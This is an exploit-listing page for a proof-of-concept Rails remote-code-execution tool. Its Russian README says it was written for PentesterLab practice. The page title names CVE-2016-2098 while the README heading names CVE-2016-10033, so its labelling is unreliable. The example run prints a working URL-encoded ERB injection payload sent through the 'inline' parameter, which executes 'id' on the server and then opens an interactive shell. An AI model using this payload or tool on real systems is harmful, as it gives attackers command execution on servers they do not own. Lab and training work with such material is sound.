Sploitus

Exploit for CVE-2016-2098-PoC

kitploit · 2026-08-27

Exploit Code

MARKDOWN35 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SEALLDEVELOPER-CVE-2016-2098-POC
# CVE-2016-10033-PoC

Написал это для PentesterLab

> Если вы из PentesterLab, не жульничайте, так гораздо лучше учиться.

Надеюсь, это кому-нибудь пригодится, если не мне в будущем :)

Имеет интерактивную оболочку, хороший argparse и т.д.

## Использование

root@kitploit:~
    
    
    usage: script.py [-h] --url URL [--param PARAM] [--proxy] [--raw] [--no-color]
    script.py: error: the following arguments are required: --url
    

## Пример

root@kitploit:~
    
    
    $ python3 script.py --url "http://localhost:8000/pages?id=test"
    [+] No parameter specified. Available parameters: ['id']
    [+] Testing parameter: id
    [+] Testing injection with URL: http://localhost:8000/pages?id[inline]=%3C%25%3D%20%25x%28echo%20SEALLDEV_OUTPUT_%24%28id%29%29%20%25%3E
    [+] Injection successful! Test output: uid=1000(webrick) gid=1000(webrick) groups=1000(webrick)
    [+] Starting interactive shell...
    [+] Type "exit" to quit
    --------------------------------------------------
    shell> whoami
    webrick